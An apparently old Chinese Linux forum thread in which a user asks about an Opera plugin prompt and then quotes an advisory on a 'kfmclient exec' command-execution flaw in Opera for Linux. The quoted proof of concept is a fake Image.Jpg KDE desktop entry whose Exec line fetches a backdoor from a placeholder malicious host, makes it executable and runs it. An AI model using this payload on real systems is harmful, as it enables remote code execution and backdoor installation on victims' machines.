opera插件

上网、浏览、聊天、下载等
回复
头像
eexpress
帖子: 58428
注册时间: 2005-08-14 21:55
来自: 长沙
送出感谢: 4 次
接收感谢: 256 次

opera插件

#1

帖子 eexpress » 2005-10-08 0:54

看不懂。kfmclient也没找到。
附件
Opera插件提示.png
● 鸣学
头像
eexpress
帖子: 58428
注册时间: 2005-08-14 21:55
来自: 长沙
送出感谢: 4 次
接收感谢: 256 次

就找到这个

#2

帖子 eexpress » 2005-10-08 0:57

描述:
Opera for Linux使用"kfmclient exec"作为默认应用程序处理保存文件。

"kfmclient exec"在处理文件名时存在问题,远程攻击者可以利用这个漏洞以用户进程权限执行任意SHELL命令。

实际上"kfmclient exec"命令可用于打开"Kde Desktop Entry",然后执行"Exec="中的命令。利用此漏洞需要一个特殊的文件名扩展,如果page.Htm用于文件名,并"kfmclient exec page.Htm"被打开,那么"Exec="中的命令就会执行,相反,如果"page.htm"用于文件名,那么就会作为"kde desktop entry"打开,被konqueror查看,因此如果构建一个名为Image.Jpg文件,包含如下条目:

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor

Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------
● 鸣学
回复

回到 “因特网相关软件”